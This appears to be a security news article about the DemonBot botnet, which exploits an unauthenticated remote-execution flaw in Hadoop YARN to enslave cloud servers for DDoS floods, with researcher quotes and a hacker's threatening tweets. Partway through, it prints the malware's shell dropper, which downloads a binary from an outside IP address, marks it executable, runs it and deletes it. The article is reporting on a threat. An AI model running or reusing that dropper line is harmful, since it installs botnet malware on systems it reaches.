A Linux-based DDoS botnet dubbed DemonBot has been found enslaving Hadoop frameworks, using a vulnerability in Hadoop’s resource management tool to infect cloud servers with the botnet malware.
Hadoop is a popular open-source framework, usually deployed in cloud environments, that organizations can use to create artificial intelligence or machine learning platforms for big-data analytics. It’s deployed on clusters of servers – virtual and physical – which are often connected to the internet. As such, it represents a ripe, and somewhat underutilized, attack surface.
Enter DemonBot, which is actively enslaving Hadoop clusters to carry out DDoS attacks based on UDP and TCP floods; the security team at Radware said that it has recorded more than 5 million server requests across the globe as of this week.
Pascal Geenens, cybersecurity evangelist at Radware, told Threatpost that the malware isn’t particularly sophisticated (the author copied and rewrote existing code to fit his or her needs), but it’s extremely effective.
“It only contains the code that is required to get the job done: A command-and-control communication module and a handful of attack [binaries],” Geenens explained. “It uses cleartext TCP communication with the C2 server – lean and mean. Easy to build, no dependencies on external libraries, easy to deploy and small in size. The DDoS flood attacks are not sophisticated, but combined with powerful servers and cloud connectivity they become very effective and can generate large volumes of malicious traffic.”
To propagate the malware, the malicious actors behind DemonBot are exploiting Hadoop’s Yet Another Resource Negotiator (YARN), which provides cluster resource management for enterprise Hadoop deployments. It has a known flaw which a proof-of-concept was published in March for. The PoC attack allow for unauthenticated remote command-execution.
“YARN exposes a REST API which allows remote applications to submit new applications to the cluster,” Radware researchers explained in an analysis Thursday – in this case, the DemonBot malware.
Interestingly, even though DemonBot does not exhibit worm-like behavior and spreads only via central servers, it has managed to rack up millions of exploitations. Its virulence can be attributed to the sheer volume of determined campaigns, according to the researcher.
“We detected more than 70 servers per day that are performing a spray-and-pray attack,” Geenens said, adding that there could be many more. Detection, he said, is a bit of a difficult task because the bot itself isn’t scanning for vulnerable targets.
“So, it doesn’t create noise we can use to map out the number of bots enslaved by DemonBot,” Geenens explained. “We are looking at mapping out all vulnerable servers on the internet, that would be a starting point to quantify the risk. We did find some unique markers in the source code of DemonBot, and we might be able to identify attacks originating from it, given they use that specific attack vector.”
Despite the fact that quantifying the threat is a work in progress, some headway has been made on the attribution front thanks to cantankerous posts from a black hat that goes by the name “Wanted” and uses the @Hacker_R_US Twitter handle. On Twitter, he made threats towards the media and Radware, telling them to “leave DemonBot alone.”
“Our blog was not live yet, so he had no idea yet that we managed to get access to the full source code of his DemonBot,” Geenens told us. “[Now], this might escalate.”
!/bin/bashcd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://18.104.22.168/ntpd; chmod +x ntpd; ./ntpd; rm -rf ntpd
ATTACKS WILL start soon (part of the payload)
Leave Demonbot alone or attacks will start on all news sites that publish it@hypoweb
— Wanted🙂 (@Hacker_R_US) October 25, 2018
In any event, DemonBot represents a new trend of targeting the cloud. While the internet of things (IoT) has dominated the DDoS botnet scene since Mirai debuted in 2016, malicious actors always look to turn their sights to new attack surfaces. As such, cloud infrastructure servers have been increasingly targeted by adversaries. For those interested in DDoS, cloud infrastructure like Hadoop can offer more bang for the buck.
“Hadoop clusters typically are very capable and stable platforms and can individually account for much larger volumes of DDoS traffic compared to IoT devices,” Radware researchers explained.
Geenens pointed out that Hadoop has been abused in the past by other malware such as XBash, and earlier this month, NewSky security researcher Ankit Anubhav discovered a hacker leveraging the same Hadoop YARN bug in a Sora botnet variant.
“Whatever vulnerable systems people leave exposed on the internet will become a weapon or an extortion tool at some point in time,” Geenens told us. “If the exploit is there and there are enough exposed services to abuse, they malicious actors will go for it. There is very much a large-scale problem with IoT and exposed/misconfigured cloud services.”
It should be noted that DemonBot is not limited to infecting Hadoop servers; the researchers saw in the code that it’s also binary-compatible with most known IoT devices, following the Mirai build principles. For now, they did not find any evidence that DemonBot is actively targeting IoT devices.